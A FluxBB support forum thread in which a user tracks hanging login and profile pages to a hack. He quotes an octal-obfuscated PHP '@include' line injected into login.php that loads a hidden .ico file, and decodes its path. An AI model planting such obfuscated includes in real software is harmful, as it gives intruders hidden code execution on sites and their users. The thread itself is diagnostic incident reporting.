Forums

Unfortunately no one can be told what FluxBB is - you have to see it for yourself.

You are not logged in.

#1 2018-11-27 11:19:24

SeanRiley

Login, Register and User Profiles pages not being displayed

Hi,

Firstly thanks for a GREAT product!

Secondly, I have installed the following system

FluxBB 1.5.10 on PHP 7.0.32 and MySQL 5.7.24 on an Ubuntu 16.04 LTS server.

I have manually added the 100 or so topics and posts from an older wordpress forum tool.  All has been working perfectly and I have been able to login and out without issue.

Today though I tried to logout and login again and my browser just sits there never doing anything (I do not see the login screen when I click on the login menu option).  When I put _mysite_com/myForum/login.php in the url bar in my browser I never get to see the login page.  The same applies to the register.php page.

I can list the topics and posts and even search successfully.  I am able to login from a different php site (mantsibt) on the same server so I am sure that the php is working (I can even create a phpinfo(); page that gets displayed properly).

When I run php viewform.php from the servers console (as an example) I get the html code displayed on the console.  However when I do that with login.php page I get nothing it just sits there in the console.

I have no idea what to look for next.  I have cleared the cache on my machine and even tried to get to the login screen from another machine.

Any ideas as to what I can look for next?

Thanks

Last edited by SeanRiley (2018-11-27 11:23:22)

#2 2018-11-28 08:35:24

SeanRiley

Re: Login, Register and User Profiles pages not being displayed

Some additional information. 

I extracted fluxbox 1.5.10 into a new directory on my server.   I couldn't install again as I pointed it to my existing db when I ran install.php

So I took a chance and copied the config.php from my old install to the newly extracted directory ... and low and behold I could login.. ?!?

However when I logged out again and tried to login again I got the same issue as before.

Grrr this is really frustrating me.

When I hit the back button till I get to the first login page I can login again.  But I cannot open my profile.  I can list the users however when I click on their names to display their profiles nothing is displayed ...

#3 2018-11-28 09:27:02

SeanRiley

Ok, some further findings.  When I logged in I was redirected to the first site.

When I manually change to the newly extracted instance I can see my profile, register and see my users profiles...

Could this be a permissions thing on the original instance?

I WAS HACKED on 24th November!!!!

while waiting to be able to post the above comment for 30 mins I kept looking around.

Turns out that the following was added to my login.php file

/*43eff*/

@include "\057var/\167ww/h\164ml/s\170i-fo\162um/l\141ng/.\066910e\142db.i\143o";

/*43eff*/

replacing the Octal chars based on web.cs.dal.ca / ~zyu/ascii.html I see that whoever hacked my site add the following include

@include "/var/www/html/myforum/lang/.6910ebdb.ico";

I found that file and am having a look at decoding it (looks like to could possibly be url encoded)

Index.html.bak.bak files were also add in  the styles dir and the lang dirs.

This is really frustrating as it is just wasting a lot of time.

#4 2018-11-29 22:36:28

Franz
Lead developer
Website

I am glad to hear you found out the reason, but sorry to hear you've been hacked. Please let us know if you find out how they got access to the server, and good luck with cleaning up! smile

fluxbb.de | develoPHP

"As code is more often read than written it's really important to write clean code."

Board footer